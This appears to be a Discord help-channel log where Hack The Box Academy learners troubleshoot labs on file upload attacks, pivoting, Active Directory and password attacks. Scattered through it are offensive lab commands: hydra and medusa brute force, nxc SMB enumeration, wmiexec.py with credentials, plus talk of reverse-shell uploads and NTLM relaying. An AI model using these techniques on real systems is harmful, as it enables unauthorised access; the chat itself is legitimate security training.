I clicked on the Machines tab on the left sidebar and chose the UnderPass challenge. I also got VPN credentials for Machines from the top rigth corner and I started UnderPass and I'm still getting timeouts.

Try sudo killall openvpn and try again

Ip route also to check

Whelp now at least I can connect via the Virtual Machine. Still can't get OpenVPN to work.

On your VM what's your NIC set to?

Some combination of things, including sudo killall openvpn caused it to work 🙃

Bridged, Auto, etc? Not sure which platform you are using

ok, my bad. I had that issue once with Fusion

That was a fun learning opportunity. Yall are awesome, thanks for all the help.

Your answer answers the question "How would you text align an H1 element"

To match the format of the question, I'm guessing the answer is text-align: left

The format was there in the question 😅

Read and follow #welcome to upload images here

Hmm I did that last night but I guess I did it wrong.

Hello @acoustic owl Where do I get help from HTB staff regarding HTB academy modules question. Im stuck at this one for hours

If you have an annual subscription, you have access to the complete solution. Otherwise there is no help from the staff.
Just ask your question here on Discord and someone, maybe even from the staff, will hopefully be able to help you

Im doing question 1 of DACL II skills assessment. I have set up chisel just like the solution pointed but when i run finddelegation its just timing out.

Hello, im pretty new to pentesting and did the web requests module, but i got stuck at crud api, there is one exercise, but i dont seem to understand, its this one: Exercise: Try adding a new city through the browser devtools, by using one of the Fetch POST requests you used in the previous section.

i have a question regarding Skills Assessment - File Upload Attacks module. i got the ||upload.php|| file, in which the file gets ||renamed before storing|| with this style: ||ymd|| which should mean ||250330|| right ?

complete filename would be: ||250330_name|| but i can't get that file

but cant find the file under the upload directory ||user_feedback_submissions||

I just used ligolo, so if you are familiar with it, might be a good alternative to whatever the provided solution is using.

In the Live Engagement for host one, has anyone tried the 2nd upload vulnerability suggested in the hints?

sorry to ask maybe I'm not that updated but how do I access doxbin?

What? This channel is for discussion about the Academy platform on HackTheBox. This server isn't for illegal stuff or doxxing people.

Same issue again with this module. Can't log in even though i waited for 10 minutes instead of the2 to 3 the module says.

which module/section and what's the error

I tried xfreerdp(3) and can't get access - Unconstrained Delegation - Computers (Kerberos Attcks). https://academy.hackthebox.com/module/25/section/142

I am giong to wait for about 20 minuts this time and maybe it'll work, lol

try removing the password from your connection command

and the -p argument entirely

then remote in and type the password into the password field

same result. I tried that last time i had this issue and it didn't work.

I might need to go to next section and double back later.

try it again but remove the prefix from the username

ok

I even tried with the local user even though it's supposed to be domain (just for kicks)

Are you using the correct port?

Good call r1cky

Good catch. My bad. But still no login

that's not how you select the port with xfreerdp iirc

try /port:

my bad. When i did xfreerdp -h it showed that's how you select port

weird i've never done that, man shows /p:

Still no log in

I already reboot my system and reset the vpn.

not sure that port is an argument I think it means to add the port after the colon in the /v parameter

that's what i thought too, but there is probably another way too.

I mean:

/v:<IP>:<PORT>

Yup that was the first pic above the last one i posted

o mb 😅

well you're getting connection reset by peer error, not wrong username/pass

under which one?

your latest pic

Ok.

I'll probably just go ahead and double back. Maybe it'll feel sorry fo rme and work, lol

I just tested, works fine for me with xfreerdp3

not so sure what i am doing wrong.

I think is your way if thinking, instead of rush all the modules needed or retired machines, have fun! what if I do this? what if? if I write this in a different way, be creative, be different, how this service works? some think interesting? write a python or bash script which automatize the vulnerability, if you dont know how ask chatgpt, ask why to every thing that you don't understant, have fun with hacking

sorry for the question but is there a module in HTB that teaches about the tool "ligolo"?

No

You can run it either way.

Unfortunately no, ~~should really be taught in pivoting imo ~~

Please don't post flat out solutions like that.

Sick of saying it

..so will get AI to code a solution warning bot

🤣

Ive heard from everyone that it makes pivioting really easy and everyone is using it in both OSCP and CPTS

Really hope they will teach it soon since i learn the most from HTB

I tried it and still not working.

It does, but I don't think it warrants its own module, it's just that easy, also it's still better to learn other pivoting techniques through ssh, chisel, metasploit, etc. as they provide deeper level of knowledge than just, establish tunnel go brrr

I'd advise Googling the error codes you are receiving, there's a very particular reason why it is failing

This will be my 5th reset. I will reset and wait for about 15 minutes while reading through the next section

I guess it would be wonderful if its a section in pivoting module

If you are referring to what I posted, I didn't mean to spoil anything and figured since that is what the section provides you to login, i.e. similar to SSH into the target with htb-student... I didn't think there was any harm. Regardless I will ensure to go to DMs.

Thank you.

If it's over Tier 0, pasting module content, whether part of the solution or sections, it's best to err on the side of caution and go to DM

It does have really good documentation though... https://docs.ligolo.ng/

for more information on pivoting the pivoting module is pretty good (so far... am still going through it)

You can DM if you'd like and I can look at some other things on your end.

On the footprinting module medium, i have rdped and fount the important file but i dont see how i can use it? i have tried to do it for the db and its not correct and i cant even enter the @ sign in a "run as administrator" field

Have you tried authenticating as the other user on the machine?

i have tried to rdp with that login

Back to modules?

Back to ignoring my professors 😅

Not rdp in particular, just access the file 👀

guys who did the CBBH, im in the Burp Intruder secition and my Burp has been running for too long how do I solve this

• 2 Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.

you mean the sql server?

I literarly added the fuzzing points after the /admin and the bruteforce is working good, its just that its not catching anything and its been like this for a while

it just caught a blank page of index.html

The password doesnt work for the sql server tho

maybe im just missing something obvious

hello there,
is there anyone (in the administration or others) who could check my report/documentation of my pentest assignment? I want to learn how to write a documentation but I don't know who can I ask to check if it's correct or is it missing some important aspects.

oh I just found the Documentation and Reporting module...
Imo it should be at the beginning of the CPTS path not at the end so ppl can already write more "professional" reports.

#boxes

alright i got it

i cant type @ for some reason in that admin menu

i found out that using a virtual keyboard was the solution by looking through the comments here in discord

yeah, you'll write a beautifully formatted report

full of nothing

Jesus that’s funny

thank you

wouldn't u love to see beautifully formatted nmap output?

I used FFUF or gobuster it worked way faster

since burp without the subscription is really slow thought it would be better to use something else

What's the difference between the Introduction to Networking Course and Network Foundations?

Network Foundations goes deeper

i’m on the first question of the web proxies skills assessment and it’s asking me to enable a button the the webpage /lucky.php

i found the line that disables it but it’s only in the response not the request , how can i modify this ?

I believe that module goes over how to capture responses in Burp too

caido

Is anyone working on the Academy labs and can’t connect to their target host? I’m having trouble RDP and it appears unusual.

i captured it

but the line is in the response

so i can’t send the edited line back to the server

how do i go about this ?

where can you send it to?

Try the TCP vpn it works beautifully with RDP

i can only send requests

Beautifully slow

If UDP then yes lol
But TCP saved my life

used to take an hour on each section of Active Directory Enumeration & Attacks because of RDP with UDP vpn but when i switched it took way less to finish excersies

Yeah... I'd probably just setup a pivot then work off the attacker machine

any ideas ?

You've captured the response?

#modules message

The modules are down

yes

I’ve been ok rdp into these labs but they have now failed

there’s a string that says “disabled” , i’m able to delete it but that won’t go back to the server

https://status.hackthebox.com/

they look up to me

Module/143/section/1420

Do you need it to go back to the server? 👀

Rdp

Q's: I'm in infosec mod setup: been talking about downloading an installing a linux vm

Can’t rdp I’ve been fine before

Looking at Parrot OS

But why couldn't we run SeLinux cmd on Parrot?

well whenever i hit the button it adds the disabled string back, so i thought so

get anything on burp after clicking it?

I’d submit a ticket but all they will do is ask if it’s down instead of diving deep into anything

yes , i get the request

i sent it to repeater to see what the response will say but it is still disabled

as well as when i forward it

Q: is it possible to run SELinux on Parrot OS eventually? If I have admin right and download the packages?

it's not feasible

has anyone here done the web proxies module yet ?

If you can't delete it, think about what else you may be able to do to get it working.

hi everyone I start with ccna course can you tell me the tobic i should know it very will to be professional

Huh?

This is for HTB related discussions etc, but regardless you're not going to be given tutoring to pass CCNA, you should be doing that learning part yourself as part of the process.

Ok thx

So I am working on file upload attacks and in the non-blacklisted extensions section it tells you to use a certain extension, which in the lesson it works but when you try yourself it does not. I can try other extensions I am just confused why in the section it continues on as if it worked I guess

the sections are not generally a 1:1 guide on the challenges at the end

you're supposed to apply what you've learned to the challenge

Thank you for confirming that, I had a feeling and just wanted to be sure hunting for the answer myself is expected

Need a hint regarding the Footprinting Lab - Medium; I discovered user and passwd for smtp but i don't know what can I do next...

cuz there's no smtp service on the target system and I dont have access on the smtp's machine

Im currently studying for the CPTS
In the Moving files modules i dont feel like i fully grasped the concept(i was able to move files but needed more umph i guess) and need additional resources.
Are there any boxes you can recommend that deal with file transfers and maybe requiring some base64 encoding to do so?

Have you tried: using the credentials for other services? 👀

I just found smth, gotta test it; BRB

found RDP but ughhh now I need creds to login to sql...

is it really medium lab? not hard? haha

Curious why the hint for flag 1 of the Using CME skills assessment is so misleading. Asking you to enumerate a null session that doesn't exist.

Output:

$ nxc smb 10.129.204.182  -u "" -p ""
SMB         10.129.204.182  445    SQL01            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SQL01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB         10.129.204.182  445    SQL01            [-] INLANEFREIGHT.LOCAL\: STATUS_ACCESS_DENIED

Yet the hint says to review the Enumerating Null Sessions section. So what null session is that hint talking about?

@waxen totem sorry but need help... I found the creds for the database (creds are 1000% correct) but I get an error login failed for user sa

@sleek urchin

using the same creds over 20 times I finally get different output:
A connection was successfully established with the server, but then an error occurred during the login process. -> No process is on the other end of the pipe

Tried using both smbclient and rpcclient to debug this, also to no avail. Anyone?

Again, CME Skills Assessment here.

ngl imma rage here soon

Taking this to #1234357888114364508 because still nothing.

nah, you GOTTA be kidding me; the problem was I didn't run the app as admin hahah

[Solved]
Hello everyone,

I'm currently working through the Windows Privilege Escalation module and encountered a possible issue in the Credential Hunting section.

In Question 2:

"Connect as the bob user and practice decrypting the credentials in the pass.xml file. Submit the contents of the flag.txt on the desktop once you are done."

I successfully connected as the bob user, decrypted the credentials, and retrieved the flag.txt file from the Desktop. However, even after submitting the correct content of flag.txt, the system still marks the answer as incorrect.

I also double-checked the result using "Show Solution", and my answer matches it exactly — yet it still gets marked wrong. It seems like this might be a bug.

Could someone assist me with this issue? I’d really appreciate any help!

maybe there's a SPACE somewhere?

at the beginning or the end

Check for non-printable characters. If you're using Wayland, there's a known issue where stuff copied and pasted from RDP often includes carriage return characters because of the differences in character handling between Windows and Linux.

hi, in the Web Server Pivoting with Rpivot section of the Pivoting, Tunneling, and Port Forwarding module, i can't seem to use "proxychains firefox" against the webserver because of DNS resolution problems, but i can still cURL it, does anyone know what causes this?

So ive been hacking away at this for a bit and am finding myself stuck. I am currently on File upload attacks on the section 'Blacklist filters'.
I have set up burp to grab the request for an upload, fuzzed the endpoint and found a number of extensions that upload successfully but does not return a test hello world I did as the script when I sent it to the repeater to test each out.

I can't figure out what I am doing wrong.

You could also setup foxyproxy

i'm not too familiar with web attacks yet, isn't this the extension to set up proxies ?

if so, i guess i should use it to access the webserver directly from my browser right?

Yeah but I guess thats probably out of scope

I also used curl then

probably, i added it to my notes just in case but yeah curl works just fine

thanks

I am stumped

Never mind, figured it out. Module literally forces you to go back to the pre-Ligolo form of pivoting…

yep, as stated in the section

you gotta use chisel to connect to the network

omg Ligolo doesn't give the exact functionalities of chisel and stuff?

im currently learning about pivoting and i heard pretty much everyone here praise ligolo so i was kinda happy knowing i would have an easy way to do all of that (but i guess not lol)

It does, but this module/section is literally designed as such that it's got Chisel preinstalled and running and you are forced to connect to it to gain an initial foothold.

The thing that makes Ligolo more efficient, at least, is that you're using tunnel devices to tunnel the connection as opposed to a user-mode proxy. Having the kernel do the tunneling for you means you don't need to proxychains anything and it's also much faster overall.

hello, I'm working in "Active Directory Enumeration & Attacks", I have a issues to get the first question : What is the default Minimum password length when a new domain is created? (One number)
I'm confuse how solve it first question

I mean.. did you run through the sections?

Because there's literally a section dedicated to what you asked

yes, i did in the section explain it with smb, this server dont run smb also is debian server

You're missing something in that section then

I'd advise reading back over the section 🙂

Also... re-read the question

See the "Enumerating & Retrieving Password Policies" section. There's some very important information there about this.

Hello everyone. I am currently trying to finish the File Upload Attacks module, type filters section. I have gotten as far as avoiding all the countermeasures, and my shell is uploaded. The only issue is I can't seem to extract the flag even though I bypassed the protections including MIME. Any pointers are welcome, going to keep trying in the mean time.

Who can I dm here on file upload attacks assessment

Ah?

I cant leak

Here

#1024429874246590575

Just wanted to say that Footprinting Lab - Hard was awesome; fr, had so much fun ❤️

it was a bit hard at the beginning cuz I forgot about existence of one important thing but after that is was awesome

Hi im currently stuck in Password Attakcs Module, Network services, trying to brute force rdp, the other had no issue, but rdp with hydra doesn seem to find anyuthing, i've been waiting for 1 hour and a half

Hi
When spraying passwords against AD
Do i need to use the CN name
Or the user principal name ?

Which module is this relating to?

hi, can anyone help me with a problem
module: Attacking Web Applications with Ffuf
section: Page Fuzzing
Found the flag but when i submit it says that it is incorrect

Try to check for spaces before/after the flag

no spaces 😦

dm me the flag and I will check 🙂

Hi im currently stuck in Password Attakcs Module, Network services, trying to brute force rdp, the other had no issue, but rdp with hydra doesn seem to find anything after compliting the brute force, i used the resources given in the right way, but still it doesnt work out.

anyone got the file upload attacks skill assessment and can help me ? when i intercept request, the request doesn't come from upload.php but from submit.php

how can i get an upload request to the upload.php ? I only need this to solve the assessment

I'm currently working through the File Transfer module and had a quick question. When it comes to transferring files with Python, is it better to install uploadserver on the target host to upload files, or should I use Python’s built-in http.server (assuming Python is already installed) to avoid installing anything?

You'd install upload server on the ATTACK host so that you don't need to run a file server on the target host, also the upload server works both ways, e.g. you can also download stuff from its base directory

Thank you for the clarification !

Anyone?

have you checked the request headers in burp?

yes nothing interesting there

can you share the module link??

Make sure you intercept an upload.

OH MY GOD

THANK YOU

WHY IS THIS EVEN SO CONFUSING ? I THOUGHT SUBMITTING EQUALS UPLOADING

Easy to overlook. Highly suggest always taking the time to see how it functions before testing for things.

just viewing the source code yeah

making sure you dont miss anything

ok thank you I will check that right now

guys

i have a problem

How to write message on other channels🧐

in sqlmap skill assessment i am sure the flag is 100% correct but when i submit it says incorrect

Read #rules , #welcome and do the verification @small plume

" Exploit the SSRF vulnerability to identify an additional endpoint. Access that endpoint to obtain the flag. " In the question, I just asked for the admin.php address and gave the flag in a very ridiculous way, but the question tells us to find an additional endpoint and do a lot of processing.

Exploiting SSRF

i doing this one https://academy.hackthebox.com/module/23/section/513
Skills Assessment - File Inclusion
and what i see this access.log file is not updating ? 😕

even when i refresh many time it show the same.

Some rooms have been updated but the questions are old questions, how do I fix this, is there a room reset?

can someone explain to me why we need to run responder with ntlmrelayx ? i mean can't we just run ntlmrelayx?

Hey, I don't know if you found the answer, but I had the same issue. Actually this is not the right attack path. Just use a much simpler one and remember that the server may offer additional authentication protocols than the one used by the intercepted client

without responder ntlmrelayx is just sitting there waiting for something to happen

and you also have to consider the fact that ntlmrelayx doesn't store hashes unless a relay succeeds

whereas responder grabs those hashes anyway for cracking later, so even if relaying fails you'll walk away with something useful

Anyone having issues cant copy paste on the new xfreerdp3?

try wrapping the entire think in one single quote Ex:Question: wmiexec.py 'inlanefreight.local/wley:"transporter@"@172.16.5.5" if i am understanding your question right?

check your DM

I am missing something for when you have to disable amb server or http on responder,in order for ntlm to work.While I have done the module ,I cannot fully comprehend thath

I have gone through all of the examples in the python hijacking in the linux privilege escalation and none of them work.
the sudo -l is for the particular script, not just python
There are no write privileges on the library
I cant set the PYTHONPATH to /tmp, due to only being able to run the mem script
None of the PYTHONPATH Listings have write access.

The 3 prereqs for python library hacking are not present on any of the stuff related to mem_status.py

Ok i figured it out but im really confused. This is the perms so why is it writable?
-rwSrwxr-x 1 root root 192 May 19 2023 mem_status.py

@lusty thicket so its like responder is feeding ntlmrelay?

responder by default takes the hashes for itself without letting them go to ntlmrelayx, meaniing if responder is running with smb/http enabled it'll just grab the hashes for itself, but we don't want to just capture hashes, you want to be able to relay them onto another machine so you can use them in real time, which is why you disable smb and http

yeah responder brings in the victims and ntlmrelayx makes them hand over their hashes

we disable SMB on responder,so ntlmrelay will use port 445. aaaaaaa ok yeah i got it now.Thanks

funny thing is that i have finished the module,but still didnt comprehend this 100% ,nvm thanks

hey guys I'm still working in What is the default Minimum password length when a new domain is created? (One number) from Enumerating & Retrieving Password Policies

but I can't find the default Minimum password length when a new domain is created

Reread that section as it is provided in it.

unbelievable I was looking inside ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

that was inside the content information

need some assistance on on Unconstrained delegation -Users (Kerberos Attacks)

You can DM

hello guys i'm on active directory module, i'm stuck on that question in the privilege acces page can u help me pls ? What other user in the domain has CanPSRemote rights to a host?

i find nothing ...

what do you get when you run the cypher query
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

let me test i'll tell you

omggg it works !!! thank you so much bro.. but how can i know how to build this query ?

You're welcome!
Its a long ass explanation, its basically a relationship query between 2 entities, (a user and a computer) and the relationship is who can psremote, so it puts the result in a variable p1 for users and puts the results for users in p2 and checks who can access what and finally returns p2 as the output in the graph, there are other variables serving that represent entities/AD objects

Just pass it to ChatGPT for a better explanation, its quite interesting. (this is from the module btw)

I can help if you don't mind,you can kindly inbox me I can be of help

You have a colon included in the name for "inlanefreight.local/wley:" remove that because its recognizing that as a character thats part of the name

lol thats my point exactly wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5 look at it and compare you have a colon included in the username in quotes

Alright thank you so much !

No, you tried multiple commands, and in the ones I noticed the quotes werent even, I'm just gonna grab glasses now lmao

course material is very correct lol I've done that module over 3x

wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5 try this and if it fails just revert and try again, should work.

if it fails again exclude the password from your command and input it when it prompts for the password

Oh my god there is just too much content. How is it expected to be kept in mind.....

gotta take good note and organize them

Notes + constant practice

Yes, i did forget the practice.

Ippsec would call it "Perfect practice"

I am revisiting AD basics and OH. MY. GOD.

its too much to read.

I had to take physical notes for that one and read it 2x a day 💀

same, i am taking physical notes

as well as on Notion, but god damn...I need to put some of the content down or it will be too much for tiny brain to re-read from notes.

@faint hill your screenshot contains spoilers [password] please redact and re-ask

The password is in the course material as is the UN

It's still a module above tier 0

Not to mention cracking that pw is part of an earlier section from what I recall

It's part of the module thats above tier 0. Ergo spoiler by default

Instead of arguing with that, just redact the pw and re-ask your question

See channel description

i have problem on cpts path HTBS academy can i ask here ?

Literally only one minor issue with your post, that's all

https://dontasktoask.com

ok , i can't uploud shell.php on the web server (it work with me before i just take a rest and back and now it not work), module getting started Nibbles - Initial Foothold

i think it problem on the machine box, i restart and but still not work https://academy.hackthebox.com/module/77/section/852

Did you upload it on the image uploader thing?

can't upload
This isn't helpful without error messages or issues when you try and reach the shell.php page

i upload it on nibbleblog - Plugins :: My image , http://<machine-ip>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

Did you adjust the payload to call back to your ip when you visit it?

Your ip being your tun0 ip

yes before it was work and i upload multi shells . but now try to upload and it loading for 10 mints without any message respond

? Did you visit where it was uploaded to?

The shell won't do anything until you visit it

let me try

yes i try and i get 404 no found http://<machine-ip>/nibbleblog/content/private/plugins/my_image/image.php

Remove the /image.php and see what files are there

If you uploaded shell.php -> the file may be named shell.php

http://10.129.73.77/nibbleblog/content/private/plugins/my_image/
find only db.xml

Then it didn't upload for whatever reason

yes it not uploaded it keep loading .....and no respond

keep loading
Thats not always a bad thing

But I suggest changing vpn regions

lol let try my old crazy solution i think i will shutdown my laptop and try again

When a reverse shell is run, it will continue trying to load the page

ok

So that's not necessarily an indication of error, the page will load when you kill the shell

Hey Marcie, perhaps that part of the module needs a little heads up incase anyone tries this in the future again or perhaps this message should be in erratum I dunno. - That user isnt an admin user in the domain hence he cant wmiexec or psexec onto the DC since he cant write to any admin shares, the module unit shows that it works which is why he was confused. I noticed this question has been asked a couple times here.

I also get the same error on my end trying.

#1234357888114364508

I dislike how much the module overall just shows creds you had to uncover earlier on instead of relying on good notekeeping

I wasn't so much arguing with the error, just that it contains a password tbh. It's a valid issue that can be addressed

Unless I'm hallucinating and you didn't have to discover wley password in an earlier section

You did, LLMNR/NBTNS poisoning section.

Yeah I get that.

lol

It is one of those things I've always felt meh about because you can skip ahead find the info and not put in half the work

yup, I see you're a mod now😉 welldone!

https://tenor.com/view/thor-the-dark-world-darcy-lewis-i-dont-get-paid-period-i-dont-get-paid-i-dont-get-money-gif-22270043

is this for nibblesblog

can i send a video here >

day 2 of File Upload Attacks - Type Filters

here we go

That looks like a scam

<@&861185840277487616>

For the 1 on 1 help, do I just as a question & hope it get answer?

yup

Thank you

I'd first search the channel as you may see it's been asked before and that might be all you need to get going again.

Yooo guys does anyone know why I get two different password hashes when dumping them from the SAM and SYSTEM files using secretdump.py versus samdump2?

if I use spoiler tags is that enough to avoid spoiling or do I need to word my question to avoid details entirely? Been working a few days on the type filters section of File upload attacks.

Anyone can unmask a spoiler tag.

I know. That's why I am asking: Am I attempting to avoid people getting information they have not paid for or information they don't want spoiled?

So yeah, it doesn't nothing and it would still be considered spoiling.

Okay that helps

You can DM what you are trying. I'm afk but still might be able to assist.

mind if i DM you ?

Yeah that's fine.

Thank you. I'll try to be as concise as possible.

am try with pwnbox and i cloud upload the img after multi uploading i blocked lol idk why , i try to change the vpn stilll blocked ..

got a small question

why does this not work all the time :
hydra -L username-anarchy -P passwords.txt ftp://127.0.0.1 -t 48

but medusa does:
medusa -M ftp -h 192.168.15.138 -u username-anarchy/ -P passwords.txt

is it because of the / or what

i don't think hydra supports ftp:// in the target field

it does

both variants are possible

strange

have you tried without?

cringe a bot

for viewer boosting